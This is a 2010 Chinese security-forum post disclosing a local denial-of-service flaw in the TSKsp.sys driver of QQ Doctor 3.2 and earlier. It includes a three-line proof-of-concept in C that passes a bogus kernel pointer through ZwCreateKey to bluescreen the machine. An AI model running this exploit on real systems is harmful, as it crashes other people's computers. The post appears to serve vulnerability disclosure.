首页
论坛
专栏
课程

[原创]QQ医生 <= 3.2 内核驱动程序ZwCreateKey HOOK 本地拒绝服务漏洞

2010-2-19 14:37 4336

[原创]QQ医生 <= 3.2 内核驱动程序ZwCreateKey HOOK 本地拒绝服务漏洞

2010-2-19 14:37
4336
影响版本:
QQ医生 <= 3.2

发布时间:2010-02-19

漏洞描述:
QQ医生是腾讯公司开发的一个安全辅助工具,其用于实现注册表拦截等功能的驱动程序TSKsp.sys没有对ZwCreateKey的参数做完整的检查就直接传递给 ZwOpenKey,此时位于内核模式系统会直接使用参数中的内容,不作任何检查,因此攻击者可构造特殊的参数,使系统蓝屏

利用代码:

    InitializeObjectAttributes(&ObjectAttributes , &name , 0 , 0 , 0 );
    ObjectAttributes.SecurityQualityOfService = (PVOID)0x80000000;

    ZwCreateKey(&KeyHandle , 0 , &ObjectAttributes , 0 , 0 , 0 , 0 );

安装了QQ医生的机器上运行上面三行代码,系统即告蓝屏

2020安全开发者峰会(2020 SDC)议题征集 中国.北京 7月!

最新回复 (1)
ayunaa 2010-2-19 16:35
2
0
使系统蓝屏
游客
登录 | 注册 方可回帖
返回